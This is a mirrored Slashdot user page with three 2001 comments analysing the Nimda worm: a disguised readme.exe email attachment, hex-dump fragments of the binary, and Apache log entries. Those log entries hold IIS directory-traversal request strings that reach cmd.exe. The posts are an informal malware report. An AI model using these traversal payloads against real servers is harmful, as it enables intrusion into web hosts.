mglcel · Slashdot Mirror

s/namba/nimda/ on New (More) Annoying Microsoft Worm Hits Net · 2001-09-18 11:38 · Score: 1

it's better..

Concept (CV) Virus - Namba worm ? on New (More) Annoying Microsoft Worm Hits Net · 2001-09-18 11:33 · Score: 3, Informative

sorry for the last ugry post, bad manipulation. I've received a mail, with an attached file readme.exe declared as mime format audio/x-wav. after hexadecimal dump, i've noticed this string : 000090c0 6e 74 65 72 66 61 63 65 73 00 00 00 43 6f 6e 63 |nterfaces...Conc| 000090d0 65 70 74 20 56 69 72 75 73 28 43 56 29 20 56 2e |ept Virus(CV) V.| 000090e0 35 2c 20 43 6f 70 79 72 69 67 68 74 28 43 29 32 |5, Copyright(C)2| 000090f0 30 30 31 20 20 52 2e 50 2e 43 68 69 6e 61 00 00 |001 R.P.China..| "Concept Virus(CV) V.5, Copyright(C)2001 R.P.China" in the code i can found : 00009b20 2f 5f 76 74 69 5f 62 69 6e 2f 2e 2e 25 32 35 35 |/_vti_bin/..%255| 00009b30 63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e |c../..%255c../..| 00009b40 25 32 35 35 63 2e 2e 00 2f 5f 6d 65 6d 5f 62 69 |%255c.../_mem_bi| 00009b50 6e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 |n/..%255c../..%2| _vti_bin and _mem_bin are part of my apache access logs : 213.195.72.2 - - [18/Sep/2001:23:57:27 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 249 213.195.72.2 - - [18/Sep/2001:23:57:27 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 249 major part of the mail can be found in the hex dump as : 000092a0 0d 0a 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e |....| 000092b0 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 20 62 67 43 |.| 00092d0 0a 3c 69 66 72 61 6d 65 20 73 72 63 3d 33 44 63 |.....--| which is the code of the html part of the mail, or : 00009350 37 38 39 30 44 45 46 5f 3d 3d 3d 3d 0d 0a 43 6f |7890DEF_====..Co| 00009360 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 75 64 69 |ntent-Type: audi| 00009370 6f 2f 78 2d 77 61 76 3b 0d 0a 09 6e 61 6d 65 3d |o/x-wav;...name=| 00009380 22 72 65 61 64 6d 65 2e 65 78 65 22 0d 0a 43 6f |"readme.exe"..Co| 00009390 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 |ntent-Transfer-E| 000093a0 6e 63 6f 64 69 6e 67 3a 20 62 61 73 65 36 34 0d |ncoding: base64.| 000093b0 0a 43 6f 6e 74 65 6e 74 2d 49 44 3a 20 3c 45 41 |.Content-ID: .......| which corresponds to the mail : I 3 readme.exe [audio/x-wav, base64, 75K] (mutt output) I'm not a virus expert, but if somebody is interested by the readme.exe code or more informations, please mail mglcel@gcu-squad.org. I've sent a mail to mc-afee support to learn if they know this worm, Concept(CV).

Name of the virus on New (More) Annoying Microsoft Worm Hits Net · 2001-09-18 11:25 · Score: 0, Redundant

I've received a mail, with an attached file readme.exe declared as mime format audio/x-wav. after hexadecimal dump, i've noticed this string : "Concept Virus(CV) V.5, Copyright(C)2001 R.P.China" in the code i can found : 00009b20 2f 5f 76 74 69 5f 62 69 6e 2f 2e 2e 25 32 35 35 |/_vti_bin/..%255| 00009b30 63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e |c../..%255c../..| 00009b40 25 32 35 35 63 2e 2e 00 2f 5f 6d 65 6d 5f 62 69 |%255c.../_mem_bi| 00009b50 6e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 |n/..%255c../..%2| _vti_bin and _mem_bin are part of my apache access logs : 213.195.72.2 - - [18/Sep/2001:23:57:27 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 249 213.195.72.2 - - [18/Sep/2001:23:57:27 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 249 major part of the mail can be found in the hex dump as : 000092a0 0d 0a 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e |....| 000092b0 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 20 62 67 43 |.| 000092d0 0a 3c 69 66 72 61 6d 65 20 73 72 63 3d 33 44 63 |.....--| which is the code of the html part of the mail, or : 00009350 37 38 39 30 44 45 46 5f 3d 3d 3d 3d 0d 0a 43 6f |7890DEF_====..Co| 00009360 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 75 64 69 |ntent-Type: audi| 00009370 6f 2f 78 2d 77 61 76 3b 0d 0a 09 6e 61 6d 65 3d |o/x-wav;...name=| 00009380 22 72 65 61 64 6d 65 2e 65 78 65 22 0d 0a 43 6f |"readme.exe"..Co| 00009390 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 |ntent-Transfer-E| 000093a0 6e 63 6f 64 69 6e 67 3a 20 62 61 73 65 36 34 0d |ncoding: base64.| 000093b0 0a 43 6f 6e 74 65 6e 74 2d 49 44 3a 20 3c 45 41 |.Content-ID: .......| which corresponds to the mail : &nbsp; &nbsp; I 3 readme.exe [audio/x-wav, base64, 75K] (mutt output) I'm not a virus expert, but if somebody is interested by the readme.exe code or more informations, please mail mglcel@gcu-squad.org. I've sent a mail to mc-afee support to learn if they know this worm, Concept(CV).

Slashdot Mirror

User: mglcel

Comments · 3